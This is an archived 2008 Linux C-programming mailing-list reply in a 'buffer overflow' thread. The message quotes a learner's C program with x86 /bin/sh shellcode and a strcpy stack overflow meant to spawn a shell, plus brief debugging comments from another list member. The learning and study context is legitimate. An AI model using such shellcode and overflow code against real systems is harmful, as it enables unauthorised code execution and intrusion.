From: Varun Chandramohan <varunc@linux.vnet.ibm.com>
To: vincent-perrier <vincent-perrier@club-internet.fr>
Cc: linux-c-programming@vger.kernel.org
Subject: Re: buffer overflow
Date: Wed, 12 Mar 2008 09:59:38 +0530 [thread overview]
Message-ID: <47D75C32.5030508@linux.vnet.ibm.com> (raw)
In-Reply-To: <1205260349.5098.18.camel@localhost>
vincent-perrier wrote:
> This is bad:
> memset(&buffer,0,sizeof(buffer));
> buffer is already the address of the space:
> memset(buffer,0,...); is what I would do
>
>
fine.
> This is bad too:
> for (i = 0; i < 32; i++)
> *(long_ptr + i) = (long)&buffer;
>
> and most certainly does not do what you want.
>
>
can you suggest something better to achieve this?
> On Tue, 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
>
>> Hi all,
>>
>> Can someone tell me whats is wrong with this program? All i
>> get is seg fault. Iam trying to create a stack overflow and exec a
>> shell. Somehow its not working. The system is x86 on linux.
>> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>> Copyright (C) 2006 Free Software Foundation, Inc.
>> This is free software; see the source for copying conditions. There is NO
>> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>>
>>
>>
>> The Code:
>> #include <stdio.h>
>> #include <string.h>
>>
>> char shellcode[] =
>> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>> #if 0
>> char shellcode[] =
>> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>> "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>>
>> #endif
>>
>> char large_string[128];
>> int main() {
>> char buffer[96];
>> int i;
>> long *long_ptr = (long *) large_string;
>> memset(&buffer,0,sizeof(buffer));
>>
>> for (i = 0; i < 32; i++)
>> *(long_ptr + i) = (long)&buffer;
>>
>> for (i = 0; i < strlen(shellcode); i++)
>> large_string[i] = shellcode[i];
>>
>> strcpy(buffer,large_string);
>> }
>>
>> --
>> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at http://vger.kernel.org/majordomo-info.html
>> �
>>
>>
>
>
next prev parent reply other threads:[~2008-03-12 4:29 UTC|newest]
Thread overview: 11+ messages / expand[flat|nested] mbox.gz Atom feed top
2008-03-11 6:08 buffer overflow Varun Chandramohan
2008-03-11 8:33 ` Patrik Båt, RTL
2008-03-11 10:04 ` Patrik Båt, RTL
2008-03-11 10:41 ` Varun Chandramohan
2008-03-11 12:04 ` Patrik Båt, RTL
2008-03-11 12:12 ` ninjaboy
2008-03-11 13:24 ` Varun Chandramohan
[not found] ` <17f2441a0803110649n662264cdp5a4e20361145eac7@mail.gmail.com>
2008-03-12 4:28 ` Varun Chandramohan
2008-03-11 18:32 ` vincent-perrier
2008-03-12 4:29 ` Varun Chandramohan [this message]
-- strict thread matches above, loose matches on Subject: below --
2008-03-17 8:28 nai.xia
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=47D75C32.5030508@linux.vnet.ibm.com \
--to=varunc@linux.vnet.ibm.com \
--cc=linux-c-programming@vger.kernel.org \
--cc=vincent-perrier@club-internet.fr \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).